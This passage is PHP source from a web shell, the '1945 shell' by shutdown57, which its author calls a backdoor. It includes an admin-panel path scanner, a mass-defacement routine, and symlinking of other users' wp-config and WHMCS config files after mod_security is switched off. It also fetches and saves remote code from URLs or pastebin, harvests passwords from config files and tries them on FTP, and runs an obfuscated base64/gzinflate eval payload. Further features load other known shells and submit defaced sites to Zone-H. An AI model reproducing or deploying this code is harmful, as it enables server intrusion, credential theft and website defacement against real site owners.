762 'usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/',
763 'panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php',
764 'admin/index.php','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php',
765 'admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html',
766 'admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php',
767 'bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php',
768 'admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
769 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html',
770 'panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php',
771 'nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php',
772 'administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
773 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html',
774 'login.php','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php',
775 'pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
776 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php',
777 'adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php',
778 'admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
779 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html',
780 'login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html',
781 'panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html',
782 'adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
783 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php',
784 'adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php',
785 'panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php',
786 'adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
787 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin.asp','admin/admin.asp',
788 'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp',
789 'bb-admin/admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','user.asp','webadmin/index.asp',
790 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp',
791 'adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp',
792 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp',
793 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
794 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp');
795 foreach($trying as $sec)
796 {
797 $urll=$url.'/'.$sec;
798 if(urlExist($urll))
799 {
800 echo '<p align="center"><font color="00FF00">[+] FOUND!! --> <a href="'.$urll.'" target="_blank">'.$urll.'</a></font></p>';
801 exit;
802 }
803 else
804 {
805 echo '<p align="center"><font color="#eee">[-] NOT FOUND --> '.$urll.'</font></p>';
806 }
807 }
808 echo 'Could not find admin page.[!]';
809 }
810 else
811 {
812 echo '<p>Invalid URL entered.[!]</p>';
813 }
814 }
815
816}elseif (isset($_GET['massdeface'])) {
817 echo'<center>
818 <h3> : Mass deface :</h3>
819 <small> by indoXploit </small>';
820 function sabun_massal($dir,$namafile,$isi_script) {
821 if(is_writable($dir)) {
822 $dira = scandir($dir);
823 foreach($dira as $dirb) {
824 $dirc = "$dir/$dirb";
825 $lokasi = $dirc.'/'.$namafile;
826 if($dirb === '.') {
827 file_put_contents($lokasi, $isi_script);
828 } elseif($dirb === '..') {
829 file_put_contents($lokasi, $isi_script);
830 } else {
831 if(is_dir($dirc)) {
832 if(is_writable($dirc)) {
833 echo "[<font color=lime>DONE</font>] $lokasi<br>";
834 file_put_contents($lokasi, $isi_script);
835 $idx = sabun_massal($dirc,$namafile,$isi_script);
836 }
837 }
838 }
839 }
840 }
841 }
842 function sabun_biasa($dir,$namafile,$isi_script) {
843 if(is_writable($dir)) {
844 $dira = scandir($dir);
845 foreach($dira as $dirb) {
846 $dirc = "$dir/$dirb";
847 $lokasi = $dirc.'/'.$namafile;
848 if($dirb === '.') {
849 file_put_contents($lokasi, $isi_script);
850 } elseif($dirb === '..') {
851 file_put_contents($lokasi, $isi_script);
852 } else {
853 if(is_dir($dirc)) {
854 if(is_writable($dirc)) {
855 echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
856 file_put_contents($lokasi, $isi_script);
857 }
858 }
859 }
860 }
861 }
862 }
863 if($_POST['start']) {
864 if($_POST['tipe_sabun'] == 'mahal') {
865 echo "<div style='margin: 5px auto; padding: 5px'>";
866 sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
867 echo "</div>";
868 } elseif($_POST['tipe_sabun'] == 'murah') {
869 echo "<div style='margin: 5px auto; padding: 5px'>";
870 sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
871 echo "</div>";
872 }
873 } else {
874 echo "<center>";
875 echo "<form method='post'>
876 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
877 <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
878 <font style='text-decoration: underline;'>Folder:</font><br>
879 <input type='text' name='d_dir' value='$_GET[massdeface]' style='width: 450px;' height='10'><br>
880 <font style='text-decoration: underline;'>Filename:</font><br>
881 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
882 <font style='text-decoration: underline;'>Index File:</font><br>
883 <textarea name='script' style='width: 450px; height: 200px;'>JAYALAH INDONESIAKU</textarea><br>
884 <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
885 </form></center>";
886 }
887}elseif (isset($_GET['conf'])) {
888
889error_reporting(0);
890?>
891<form method=post>
892<center>
893<textarea type=hidden name=user><?php if(!file("/etc/passwd")){ echo"/etc/passwd gak adda";}else{ echo file_get_contents('/etc/passwd');}?></textarea><br><br>
894<input type=submit name=su value="GO GO GO!!"></form>
895</center><?php
896
897if(isset($_POST['su']))
898 {
899 mkdir('1945~',0777);
900 $r = " \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>";
901$f = fopen('1945~/.htaccess','w');
902fwrite($f,$r);
903echo "<br><center><b><i><a href=1945~>TOUCH ME SENPAI</a></i></b></center>";
904$usr=explode("\n",$_POST['user']);
905foreach($usr as $uss)
906{
907 $us=trim($uss);
908$r="1945~/";
909symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
910symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wp-config');
911symlink('/home/'.$us.'/public_html/blog/configuration.php',$r.$us.'..joomla');symlink('/home/'.$us.'/public_html/wp/wp-config.php',$r.$us.'..wp-config');
912symlink('/home/'.$us.'/public_html/wordpress/wp-congig.php',$r.$us.'..wordpress');symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
913symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
914symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
915symlink('/home/'.$us.'/public_html/secure/configuration.php',$r.$us.'..securewhmcs');
916symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-clients');
917symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-client');
918symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-billing');
919symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-config');
920}
921echo'<center>berhasil!! <a href="1945~" target="_blank">touch me senpai..</a></center>';
922}
923}elseif (isset($_GET['ctools'])) {
924 echo'
925<center>
926<h3>: Create Your Tools :</h3>
927<p><font color=white> NB : Tools ini akan mengambil script dari URL format .txt atau dari pastebin</font></p>
928 <form method="post">
929 <table><tr>
930 <th colspan=2>Import from</th>
931 </tr><tr><td>
932 URL : </td><td><input type="text" name="url" placeholder="http://site.com/1.txt" style="width:200px"></td></tr><tr>
933 <td>
934 PASTEBIN :</td><td><input type="text" name="pastebin" placeholder="4hIh93nJ" style="width:200px"></td></tr>
935<tr><td>save as:</td><td><input type="text" name="pname" value="'.$_GET['ctools'].'/mytools.php" style="width:200px" required></td></tr>
936<tr><th colspan=2>
937 <input type="submit" value="create!" name="ctools"></th></tr>
938 </table>
939 </form>';
940if(isset($_POST['ctools'])){
941 if(!empty($_POST['url'])){
942 $st=file_get_contents(htmlspecialchars($_POST['url']));
943 $fp=fopen($_POST['pname'],'w');
944 if(fwrite($fp,$st)){
945 echo "done!! --> <a href='?act=".$_GET['act']."&src=".$_POST['pname']."' target='_blank'>click here</a>";
946 }
947 fclose($fp);
948 }else{
949 if(!empty($_POST['pastebin'])){
950 $st=file_get_contents(htmlspecialchars("http://pastebin.com/raw/".$_POST['pastebin']));
951 $fp=fopen($_POST['pname'],'w');
952 if(fwrite($fp,$st)){
953 echo "done!! --> <a href='?act=".$_GET['act']."&src=".$_POST['pname']."' target='_blank'>click here</a>";
954 }
955 fclose($fp);
956 }
957}
958}
959}elseif (isset($_GET['stringtools'])) {
960 echo' <center>
961 <h3>: String Tools :</h3>
962 [<a href="?act='.$_GET['act'].'&replace='.$_GET['stringtools'].'">Auto replace String</a>]<br>
963 <font color=white> NB : tools ini adalah perbaikan dari enc0de dec0de script dan saya tambahkan coventer</font>
964 <br>
965<form method="post">
966<textarea name="e" style="width:77%;height:300px" class="form-control" placeholder="input string here [!]">
967</textarea><br><br>
968
969 <select name="opt" class="form-control" style="width:70%">
970 <optgroup label="Converter">
971 <option value="dechex">Decimal to Hexa</option> <option value="hexdec">Hexa to Decimal</option>
972<option value="decoct">Decimal to Octa</option>
973<option value="octdec">Octa to Decimal</option>
974 <option value="decbin">Decimal to Binary</option>
975 <option value="bindec">Binary to Decimal</option>
976 <option value="hexbin">Hexa to Binary</option>
977<option value="binhex">Binary to Hexa</option>
978</optgroup><optgroup label="encode&decode">
979 <option value="url">URL</option> <option value="base64">base64</option>
980<option value="urlbase64">URL - base64</option>
981<option value="cuu">Convert_uu</option>
982<option value="sgzcuus64">str_rot13 - gzinflate - convert_uu - str_rot13 - base64 </option>
983<option value="gz64">gzinflate - base64</option>
984 <option value="sgz64">str_rot13 - gzinflate - base64</option>
985 <option value="s64">str_rot13 - gzinflate - str_rot13 - base64</option>
986<option value="sb64">str_rot13 - base64 </option>
987 <option value="64url">URL - base64</option>
988<option value="64u64u">URL - base64 - url - base64</option>
989<option value="ss64"> base64 - str_rot13 - str_rot13</option>
990</optgroup>
991 </select>
992 <br>
993<input type="submit" value="Convert!" name="c" class="btn btn-success btn-sm">
994<input type="submit" value="enc0de" name="en" class="btn btn-primary btn-sm">
995<input type="submit" value="dec0de" name="de" class="btn btn-danger btn-sm">
996</form>
997
998 ';
999 $a = $_POST['e'];
1000 $o = $_POST['opt'];
1001 if(isset($_POST['c'])){
1002 switch($o){
1003 case'dechex';
1004 $s= dechex($a);
1005 break;
1006 case'dechex';
1007 $s= hexdec($a);
1008 break;
1009 case'decoct';
1010 $s= decoct($a);
1011 break;
1012 case'octdec';
1013 $s= octdec($a);
1014 break;
1015 case'decbin';
1016 $s= decbin($a);
1017 break;
1018 case'bindec';
1019 $s= bindec($a);
1020 break;
1021 case'hexbin';
1022 $s= hex2bin($a);
1023 break;
1024 case'binhex';
1025 $s= bin2hex($a);
1026 break;
1027 }
1028echo'<br>:: OutPut ::<br><textarea style="width:77%;height:300px ">'.$s.'</textarea>';
1029 }elseif(isset($_POST['en'])){
1030 switch($o){
1031 case'url';
1032 $r=urlencode($a);
1033 break;
1034 case'base64';
1035 $r=base64_encode($a);
1036 break;
1037 case'urlbase64';
1038 $r=urlencode(base64_encode($a));
1039 break;
1040 case'gz64';
1041 $r=base64_encode(gzdeflate($a));
1042
1043 break;
1044 case'sgz64';
1045 $r=base64_encode(gzdeflate(str_rot13($a)));
1046 break;
1047 case's64';
1048 $r=(base64_encode(str_rot13(gzdeflate(str_rot13($a)))));
1049 break;
1050 case'sb64';
1051 $r=base64_encode(str_rot13($a));
1052 break;
1053 case'64url';
1054 $r=base64_encode(urlencode($a));
1055 break;
1056 case'64u64u';
1057 $r=base64_encode(urlencode(base64_encode(urlencode($a))));
1058 break;
1059 case'cuu';
1060 $r=convert_uuencode($a);
1061 break;
1062 case'sgzcuus64';
1063 $r=base64_encode(str_rot13(convert_uuencode(gzdeflate(str_rot13($a)))));
1064 break;
1065 case'ss64';
1066 $r=str_rot13(str_rot13(base64_encode($a)));
1067 break;
1068 }
1069 echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" >'.$r.'</textarea>';
1070
1071 }
1072//Dec0de
1073 if(isset($_POST['de'])){
1074 switch($o){
1075 case'url';
1076 $r=urldecode($a);
1077 break;
1078 case'base64';
1079 $r=base64_decode($a);
1080 break;
1081 case'urlbase64';
1082 $r=base64_decode(urldecode($a));
1083 break;
1084 case'gz64';
1085 $r=gzinflate(base64_decode($a));
1086
1087 break;
1088 case'sgz64';
1089 $r=str_rot13(gzinflate(base64_decode($a)));
1090 break;
1091 case's64';
1092 $r=str_rot13(gzinflate(str_rot13(base64_decode($a))));
1093 break;
1094 case'sb64';
1095 $r=str_rot13(base64_decode($a));
1096 break;
1097 case'64url';
1098 $r=urldecode(base64_decode($a));
1099 break;
1100 case'64u64u';
1101 $r=urldecode(base64_decode(urldecode(base64_decode($a))));
1102 break;
1103 case'cuu';
1104 $r=convert_uudecode($a);
1105 break;
1106 case'sgzcuus64';
1107 $r=str_rot13(gzinflate(convert_uudecode(str_rot13(base64_decode($a)))));
1108 break;
1109 case'ss64';
1110 $r=base64_decode(str_rot13(str_rot13($a)));
1111 }
1112 $rx = htmlspecialchars($r);
1113 echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" >'.$rx.'</textarea>';
1114
1115 }
1116
1117}elseif (isset($_GET['about'])) {
1118 ?>
1119<center>
1120<h2 style="font-family:courier;">1945 shell <br>
1121<small style="border-bottom:1px solid #fff;"> c0dename : freedom is real!!</small></h2>
1122<img src="https://2.bp.blogspot.com/-fE4-9A9N5Gk/V1h9fkMT75I/AAAAAAAAF6o/gz0oZg-G6kkB-VL8nIxsDocraNsiYdb2QCLcB/s320/Logo%2BHUT%2BRI%2BKe-71%2BTahun%2B2016.jpg" width="500" height="300">
1123<br>
1124<table>
1125<tr><td>PROKLAMASI</td><td>
1126<marquee scrollamount=5><i><b><font color=white>
1127 Kami bangsa Indonesia dengan ini menjatakan kemerdekaan Indonesia.
1128 Hal2 jang mengenai pemindahan kekoeasaan d.l.l., diselenggarakan
1129 dengan tjara saksama dan dalam tempoh jang sesingkat-singkatnja. Jakarta 17-08-'05 Atas nama bangsa indonesia : Soekarno - Hatta</marquee></td></tr></table>
1130<h3 style="text-shadow:2px 3px 3px #fff;"> : 1945 shell ~ 71th INDONESIA KERJA NYATA:</h3>
1131<p>Assalamualaikum wr. wb.</p>
1132<pre>
1133okey.. kawan gak banyak omong!
1134shell (backd00r) ini <font color=lime>bukan rec0de dari shell manapun dan gak semuaNya saya c0ding sendiri </font> ada beberapa tools dari google dan pastebin,
1135kenapa nama shell ini "1945" karena saya ingin membuat karya pada hari kemerdekaan indonesia (code kemerdekaan 17081945),
1136udah gitu aja~ kalo ada yang gk suka atau keluhan bisa priksa ke dokter ;'v [<a href='https://facebook.com/JKT48.co' target='_blank'>dokter tamvan</a>] atau [<a href='https://twitter.com/alinmansby' target='_blank'>dokter ganteng</a>]
1137+------------------------------------------------------------------------------------------------------------+
1138 1945 shell by : shutdown57
1139: Greet Thanks :
1140-- Tuhan YME -- Pahlawan perjuangan Indonsia --
1141-- [-]sh4d0w_99[!] -- MRG#7 -- sunr15 -- kinayayume48 -- root@hex -- xXx-ID -- pastebin.com -- google.com --
1142+------------------------------------------------------------------------------------------------------------+
1143<FONT COLOR=WHITE>
1144UCAPAN TERIMAKASIH BUAANYYAK KEPADA YANG TELAH MENGHARGAI DAN MENGGUNAKAN KARYA ANAK INGUSAN INI :), HANYA ITU YANG BISA SAYA SAMPAIKAN.
1145</FONT>
1146<pre style="color:pink">
1147<b><i>Quotes :</b></i>
1148<br>
1149<b>"Jangan sekali-sekali meragukan kemerdekaan bangsa INDONESIA , karna itu berarti bahwa anda tidak menghargai jasa para pahlawan yang telah berjuang dan mendapatkan kemerdekaan kita :)"</b>
1150"Cintailah sesuatu yang berasal dari tanah kelahiranMu sendiri"
1151"Jangan sekali-sekali menghina,menghujat,mencaci maki budayaMu sendiri! :) hanya orang tidak waras yang melakukanNya"
1152"Siapa yang harus di salahkan ketika SDM kita rendah?,salahkanlah diri kalian masing-masing! karena kalian juga termasuk SDM bangsa indonesia"
1153<i>./shutdown57 & kinayayume48</i>
1154</pre>
1155SEKIAN.
1156---------+
1157</pre>
1158 <?php
1159}elseif (isset($_GET['unzip'])) {
1160echo'
1161<center>
1162<h3>: Unzip Files :</h3>
1163<br>
1164<table border=1>
1165<tr><td>file zip</td><td>Target Dir</td>
1166</tr>
1167<tr><td>
1168<form method="post">
1169<input type="text" name="filezip" value="'.$_GET['unzip'].'/file.zip" >
1170</td><td>
1171<input type="text" name="dirzip" value="'.$_GET['unzip'].'/" >
1172</td></tr>
1173</table>
1174<input type="submit" name="ext" value="unzip!!">
1175</form>';
1176
1177if(isset($_POST['ext'])){
1178 $zip = new ZipArchive;
1179$res = $zip->open($_POST['filezip']);
1180
1181if ($res === TRUE) {
1182
1183$zip->extractTo($_POST['dirzip']);
1184
1185$zip->close();
1186 echo "<br>DONE..!! extracted !";
1187 } else {
1188
1189echo "failed";
1190 }
1191}
1192}elseif (isset($_GET['download'])) {
1193 ob_clean();
1194 $dunlut = $_GET['download'];
1195 header('Content-Description: File Transfer');
1196 header('Content-Type: application/octet-stream');
1197 header('Content-Disposition: attachment; filename="'.basename($dunlut).'"');
1198 header('Expires: 0');
1199 header('Cache-Control: must-revalidate');
1200 header('Pragma: public');
1201 header('Content-Length: ' . filesize($dunlut));
1202 readfile($dunlut);
1203 exit;
1204
1205}elseif (isset($_GET['mail'])) {
1206 $e=function_exists('mail');
1207 if($e){
1208 echo "
1209 <center>
1210 <h3>: mail sender :</h3>
1211 <br>
1212 <form method='post' >
1213 <table border=1>
1214 <tr>
1215 <td>from :</td><td><input type='text' name='from' value='shutdown57@indonesia.go.id' ></td></tr>
1216 <tr><td>For:</td><td><input type='text' name='for' value='admin@".$_SERVER['HTTP_HOST']."'></td></tr>
1217 <tr><td>Subject:</td><td><input type='text' name='subject' value='patch ur site!' ></td></tr>
1218 </table>
1219 <textarea name='cont' style='width:500px;height:300px'>please..patch ur face! ur face is bad :p </textarea>
1220 <br>
1221 <input type='submit' name='sent' value='send!!' >
1222 </form>";
1223
1224}else{
1225 echo" mail() function does not exists in this website!";
1226}
1227if(isset($_POST['sent'])){
1228 if(mail($_POST['for'],$_POST['subject'],$_POST['cont'],$_POST['from'])){
1229 echo "send!!".$_POST['for'];
1230 }else{
1231 echo"failed !!!";
1232 }
1233}
1234}elseif (isset($_GET['kuchiyose'])) {
1235echo "
1236<center>
1237<h3>: Kuchiyose No Jutsu :</h3>
1238<br>
1239<p><font color=white>NB : Jika ada error/script tidak muncul ,ganti IP mu atau pake anonymoX<br>
1240(saran IP USA ) </font></p>
1241<table><tr><td>
1242<pre style='text-align:left;'>
1243 [<a href='?act=".$_GET['act']."&kuchiyose=wso'>WSO shell</a>]
1244 [<a href='?act=".$_GET['act']."&kuchiyose=jkt48'>JKT48 priv8 shell</a>]
1245 [<a href='?act=".$_GET['act']."&kuchiyose=bejak'>b374k shell</a>]
1246 [<a href='?act=".$_GET['act']."&kuchiyose=indoxploit_shell'>indoXploit shell</a>]
1247 [<a href='?act=".$_GET['act']."&kuchiyose=andela'>andela priv8 shell</a>]
1248 [<a href='?act=".$_GET['act']."&kuchiyose=injection'>1n73ction shell </a>]
1249 [<a href='?act=".$_GET['act']."&kuchiyose=sbh'>Surabaya BlackHat shell </a>]
1250 [<a href='?act=".$_GET['act']."&kuchiyose=bh'>BlackHat shell</a>]
1251 [<a href='?act=".$_GET['act']."&kuchiyose=c99'>C99 shell</a>]
1252 [<a href='?act=".$_GET['act']."&kuchiyose=r57'>r57 shell</a>]
1253 [<a href='?act=".$_GET['act']."&kuchiyose=adminer'>adminer</a>]
1254 [<a href='?act=".$_GET['act']."&kuchiyose=terminal'>terminal</a>]
1255 [<a href='?act=".$_GET['act']."&kuchiyose=root'>ByPass R00t Path</a>]
1256 [<a href='?act=".$_GET['act']."&kuchiyose=pastebin'>Pastebin auto post</a>]
1257 [<a href='?act=".$_GET['act']."&kuchiyose=whmcs'>WHMCS killer</a>]
1258 [<a href='?act=".$_GET['act']."&kuchiyose=bypass_shell'>Bypass Shell To .JPG Files</a>]
1259</pre>
1260</td><td>
1261<img src='https://upload.wikimedia.org/wikipedia/commons/thumb/a/a9/Flag_map_of_Indonesia.svg/2000px-Flag_map_of_Indonesia.svg.png' width='100%' height='100%'>
1262</td></tr>
1263</table>
1264<br><br>
1265<p><b><i><font color=white>MOHON MAAF JIKA SAYA NEMCANTUMKAN SCRIPT ANDA TANPA IJIN :V </font></b></i></p>";
1266}elseif (isset($_GET['cpbrute'])) {
1267 echo '';
1268 ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
1269 set_time_limit(0);
1270
1271 @$passwd = fopen('/etc/passwd','r');
1272 if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
1273 $pub = array();
1274 $users = array();
1275 $conf = array();
1276 $i = 0;
1277 while(!feof($passwd))
1278 {
1279 $str = fgets($passwd);
1280 if ($i > 35)
1281 {
1282 $pos = strpos($str,':');
1283 $username = substr($str,0,$pos);
1284 $dirz = '/home/'.$username.'/public_html/';
1285 if (($username != ''))
1286 {
1287 if (is_readable($dirz))
1288 {
1289 array_push($users,$username);
1290 array_push($pub,$dirz);
1291 }
1292 }
1293 }
1294 $i++;
1295 }
1296
1297 echo '<h3>: cPanel bruteForce</h3>
1298 <br>
1299 <br>
1300 <center>
1301 <textarea>';
1302 echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
1303 echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
1304 echo "[~] Searching for passwords in config files...\n\n";
1305 foreach ($users as $user)
1306 {
1307 $path = "/home/$user/public_html/";
1308 read_dir($path,$user);
1309 }
1310 echo "\n[+] Done !\n";
1311 function read_dir($path,$username)
1312 {
1313 if ($handle = opendir($path))
1314 {
1315 while (false !== ($file = readdir($handle)))
1316 {
1317 $fpath = "$path$file";
1318 if (($file != '.') and ($file != '..'))
1319 {
1320 if (is_readable($fpath))
1321 {
1322 $dr = $fpath."/";
1323 if (is_dir($dr))
1324 {
1325 read_dir($dr,$username);
1326 }
1327 else
1328 {
1329 if (
1330 ($file=='config.php')
1331 or ($file=='config.inc.php')
1332 or ($file=='conf.php')
1333 or ($file=='settings.php')
1334 or ($file=='configuration.php')
1335 or ($file=='wp_config.php')
1336 or ($file=='wp-config.php')
1337 or ($file=='inc.php')
1338 or ($file=='setup.php')
1339 or ($file=='dbconf.php')
1340 or ($file=='dbconfig.php')
1341 or ($file=='db.inc.php')
1342 or ($file=='dbconnect.php')
1343 or ($file=='connect.php')
1344 or ($file=='common.php')
1345 or ($file=='config_global.php')
1346 or ($file=='db.php')
1347 or ($file=='connect.inc.php')
1348 or ($file=='e107_config.php')
1349 or ($file=='dbconnect.inc.php'))
1350 {
1351 $pass = get_pass($fpath);
1352 if ($pass != '')
1353 {
1354 echo "[+] $fpath\n$pass\n";
1355 ftp_check($username,$pass);
1356 }
1357 }
1358 }
1359 }
1360 }
1361 }
1362 }
1363 }
1364 function get_pass($link)
1365 {
1366 @$config = fopen($link,'r');
1367 while(!feof($config))
1368 {
1369 $line = fgets($config);
1370 if (strstr($line,'pass')
1371 or strstr($line,'pwd')
1372 or strstr($line,'db_pass')
1373 or strstr($line,'dbpass')
1374 or strstr($line,'passwd'))
1375 {
1376 if (strrpos($line,'"'))
1377 {
1378 preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
1379 $pass = str_replace("]=\"","",$pass);
1380 }
1381
1382 else
1383 preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
1384 $pass = str_replace("]='","",$pass);
1385 return $pass[2];
1386 }
1387 }
1388 }
1389 function ftp_check($login,$pass)
1390 {
1391 @$ftp = ftp_connect('127.0.0.1');
1392 if ($ftp)
1393 {
1394 @$res = ftp_login($ftp,$login,$pass);
1395 if ($res)
1396 {
1397 echo '[FTP] '.$login.':'.$pass." Success !\n\n";
1398
1399 eval(gzinflate(base64_decode('rVPBbtswDL0b8D9ohoEmgFtUzmVo1qHDkC49rDPiZId2RaDITOrVEQ3JQdEN+6D95UTJSbHB2cnxQeIj3yMjknGBW1EqdsniZT6ZfZ3M7k+m83m2nH7J5ycP4zCI65Rbd8r9PaV76u/nb51lD7Kld64NyiesQQ1ir50QK4lBa4XuMI1O+Pmw5fBjHH6c4xN3sqyrm0dfuR68cXUOw+BnLPhlNNEadTT+FQZQGdij+U5KMCYar2WFBgaeQ1GvGtxrpJ0aabcG/0fDFutVRp0qo24VYnkd6oKxzYvC4LSv3zcVBh9roaBii7oQDbAbtUZ2X+MzaCjY6oV9WtzcTnI2A4kFEPBZmKflVmxKWQp1xx4YifRa0RRNwy5Y22hCFgY0IRVuPJAJYwio7dl7/g+2DXXDMtSN+3N5PrW5nGknhpDrefaKpITIzL3iARz1XtVvu3yct/1I/urCD5v10LCZHZ2VUEXZ3PVcQ0Qb2aDdxkiozaYEgVpcvYhHxDOJW+fWIMv6vxFmt/oOsqGY9tHovU3eTqCLeQRRgDYUc61xe8F2zvdOwbO5kvWpN89KO6zviWDnpBrY0pK9ekK7kux1hocQV97RqD8=')));
1400
1401 echo '[SSH] Port' .':' .$a1. " !\n\n";
1402 echo '[FTP] Port' .':' .$a2. " !\n\n";
1403 echo '[cPanel] Port' .':' .$a3. " !\n\n";
1404
1405 }
1406 else ftp_quit($ftp);
1407 }
1408 }
1409 echo '</textarea><br><br><b>BruteForce Completed ...</b>';
1410}elseif (isset($_GET['copy'])) {
1411echo'
1412<center>
1413<h3>: copy file :</h3>
1414<br>
1415<form method="post">
1416file :<input type="text" name="copy" value="'.$_GET['act'].'" style="width:200px"> copy to:
1417<input type="text" name="copied" value="'.$_GET['act'].'/copy-" style="width:200px">
1418<input type="submit" name="cop" value=">>">
1419</form>';
1420if(isset($_POST['cop'])){
1421 if(copy($_POST['copy'],$_POST['copied'])){
1422 echo" done!! copied! <a href='?act=".$_GET['act']."&src=".$_POST['copied']."'>".$_POST['copied']."</a>";
1423 }
1424}
1425}elseif ($_GET['act']=='logout') {
1426 session_destroy();
1427 echo'<script>
1428 alert("bye.. !!!!!!!!");
1429 window.location.href="?";
1430 </script>';
1431}elseif (isset($_GET['phpinfo'])) {
1432 phpinfo();
1433}elseif (isset($_GET['zoneh'])) {
1434?>
1435<center>
1436<h3>: Zone-H Mass Notifer :</h3>
1437</center>
1438<form method="post">
1439<center>
1440<input type="text" name="depecer" style="width:500px" placeholder="defacer">
1441<br>
1442<textarea name="url" placeholder="http://korban.com" style="width:500px;height:300px;"></textarea><br>
1443
1444<input type="submit" name="go" value="subMitt" >
1445</form>
1446<?php
1447$url = explode("\r\n", $_POST['url']);
1448$go = $_POST['go'];
1449function kirim($target,$hacker) {
1450 $ch = curl_init();
1451 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1452 curl_setopt($ch, CURLOPT_URL, "http://zone-h.org/notify/single");
1453 curl_setopt($ch, CURLOPT_POST, true);
1454 curl_setopt($ch, CURLOPT_POSTFIELDS, array(
1455 "defacer" => $hacker,
1456 "domain1" => $target,
1457 "hackmode" => "1",
1458 "reason" => "1",
1459 ));
1460 $res = curl_exec($ch);
1461 curl_close($ch);
1462 return preg_match("/<font color=\"red\">OK<\/font><\/li>/", $res);
1463}
1464if($go) {
1465 foreach($url as $sites) {
1466 if(kirim($sites,$_POST['depecer'])) {
1467 echo "<br>[ OK ] => $sites <br>";
1468 } else {
1469 echo "<br>[ ERROR ] => $sites <br>";
1470 }
1471 }
1472}
1473
1474}elseif($_GET['mobile']){
1475 if(!$_SESSION['responsive']){
1476$_SESSION['responsive']="<meta name='viewport' content='width=device-width,inintial-scale=1'>";
1477}else{
1478echo $_SESSION['responsive'];
1479}
1480}elseif($_GET['mobile_off']){
